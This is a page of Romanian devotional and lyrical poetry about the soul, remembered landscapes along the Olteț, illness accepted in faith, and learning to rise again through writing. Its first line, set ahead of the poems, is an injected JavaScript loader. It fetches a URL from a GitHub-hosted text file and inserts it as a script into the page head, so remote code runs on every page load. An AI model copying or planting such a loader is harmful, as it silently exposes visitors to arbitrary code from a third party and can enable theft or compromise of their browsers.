;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
Ce înseamnă asta, limpeziri şi tăişuri,
limpeziri şi tăişuri până la despicătura
dumnezeiască a
sufletului cu duhul: oare, că mă trezesc
cum şi adorm când ploile cad uniform
şi-abia trezit iar pic de somn, ca fiecare
da, fir de nisip menit să strălucească
doar la ivirea zorilor, în soare ?
să strălucească, lumea să-mi revină
subit în minte, gata mascată
cu aerul cel mai firesc că a fost tot timpul cu mine
în chilioara scufundată
şi oricum, de aici înainte cât va fi cinul pustnicesc
nu se va mai lăsa dusă, plecată –
ceea ce în definitiv fără să vreau s-a întâmplat,
numai că ea nu vrea să ştie deşi demult a aflat.
Doamne, cumplite sunt aceste munci, aceste vremuri
când cel ce vine din urmă îţi suflă ostentativ,
„de-al dreacu“, în ceafă,
deţinător autoproclamat al chipului şi asemănării Fiarei,
mai şi cocoşindu-se că n-are suflet
şi nici nu-i treb’ă.
de mic copil, cum se spune, nu vreau să supăr pe nimeni,
dar uite poezia ca şi iubirea autentică este mai mare
decât înţelegerea autorului,
decât înţelegerea oricui –
chiar decât înţelegerea chipului şi asemănării
fiarei ăsteia bicisnice care-şi suflă în pumni
şi tremură-ntr-un colţ că n-are suflet : are, săraca!
nu dorm, precum se vede. nu dorm şi iar mă simt
ca o ţigară de pe timpuri aprinsă între degetele
unui neica mort
sau, şi mai şi,
ca biet caiet de şcolar ficţional
deschis în faţa unei scorburi care citeşte şi tace
tace – că n-a înţeles nimic
tace – că a înţeles totul.
bătrână, scorbura tace oricum
fără ani, şcolarul creşte şi creşte.
(cât despre neica recentul, nu am idee:
la moartea lui, cum tuşi o femeie,
a şters-o englezeşte).
Acolo unde am vorbit cu tine sau cu oricine
am râs, ne-am sărutat la nesfârşit
cu lanul de grâu verde
la umbră de mărăcine, pe loc bătătorit
de lacrima nimănui, de lacrima vântului –
pe unde ne-am plimbat la asfinţit
înlănţuiţi ca fuioare de fum,
rotindu-te de-atâtea ori în jurul braţului meu,
morişcă veselă pe drum
şi am mas până seara târziu sub licărul stelelor
pe malul Olteţului, sub Dealul viilor la Cheleştină
sau în pădurea veşnică Bercica unde nu
se întâmplă nimica
nemâncaţi dar hrăniţi oarecum cu aerul
mult mai curat la Osica decât acum –
sufletul meu după moarte se va întoarce spăşit
levitând, în zbor planat nu ştiu cum
cu mâna la nas, peste scârba gunoaielor aduse, vai,
din sat de oameni, nu de ape
va ocoli, va cerceta pas cu pas, pai cu pai
tot locul îndeaproape.
şi abia recunoscând, lăsat acolo, uitat
la umbră de mărăcine
tot ce-a fost în viaţa asta mai curat –
lacrima nimănui, lacrima vântului –
curăţindu-se şi el subit de tot ce-a mai rămas din mine,
pe deplin uşurat, în sfârşit
salutând (mi-ar plăcea) vitejeşte, nu stingher
se va-nălţa cu tot locul acela ca fulgerul la cer.
Şi a fost seară, şi a fost dimineaţă
de-acum începem – iar ! – o altă nouă viaţă
au apărut nişte (ca să dau un citat) „markeri tumorali“,
starea generală s-a zburlit abitir
după cele săptămâni de claustru forţat.
nu sunt surprins, nu mă mir
fie numele Domnului lăudat !
la drept vorbind, nici nu trebuie cineva
dintre-ai mei, ori străin, să se mire –
cu ani în urmă, sănătos-tun, sastisit
de-aceeaşi continuă stare/stagnare pe linia de plutire
am clamat, aş spune acum, oarecum în neştire :
„Doamne, dă-mi ceva, o boală întru despătimire,
un spin în carne, gheruţă de iarnă, şarpe de dudău!“
şi uite, Bunul, realmente a procesat chiar şi ruga
dintre toate cea mai scoasă din fire a netotului Său.
voi fi prin crucea asta paradoxal de dragă
într-un final la suflet o ţâră mai curat,
mai simplu, în Iisus mai bun băiat,
şi Maicii o să-i cânt la greu
ceva ce n-a mai ascultat,
ceva ce încă n-am cântat
dar urcă în mine a cântare mereu.
***
Nu credeam să-nvăţ a’nvia vreodată
s-a-ntâmplat scriind aşa cum am scris
cu viaţa mea toată în viaţa mea toată –
scaieţi pe un perete văruit încet, cu lumină
– dar ce lumină ! –
lumină-n piele de fată în mine neînserată.
nu, nu credeam să-nvăţ a’nvia vreodată.